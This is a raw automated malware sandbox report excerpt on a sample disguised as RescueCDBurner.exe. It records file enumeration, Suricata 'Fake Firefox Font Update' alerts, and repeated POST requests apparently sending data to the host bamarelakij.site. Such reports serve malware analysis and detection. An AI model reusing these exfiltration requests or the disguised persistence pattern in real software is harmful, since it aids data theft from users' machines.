Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43110C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43110C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42D687 _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,3_2_6B42D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F593 _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F593
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: 4x nop then or byte ptr [edi], dh 3_2_6B3E7270
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe Code function: 4x nop then push esi 3_2_6B3DF680
Source: Joe Sandbox View IP Address: 18.244.18.27
Source: Joe Sandbox View IP Address: 20.42.65.85
Source: Joe Sandbox View IP Address: 20.110.205.119
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49872 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50073 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50111 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50113 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50115 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50118 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50117 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50114 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50119 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50112 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50120 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50116 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50121 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50122 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50123 -> 104.21.80.52:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50124 -> 104.21.80.52:443
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 208Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201884773&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3857sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1E1e49df192553de02181e61736201885; XID=1E1e49df192553de02181e61736201885
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887861&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11511sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201887865&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5103sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; _C_ETH=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888101&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5380sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201888863&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9879sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 106564Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 58769Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 68882Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 109611Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 68839Host: bamarelakij.site
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveOrigin: https://assets.msn.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveContent-Length: 1002Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 940Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknown TCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown TCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknown TCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.219
trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global traffic; DNS traffic detected: DNS query: bamarelakij.site
Source: global traffic; DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic; DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic; DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic; DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic; DNS traffic detected: DNS query: c.msn.com
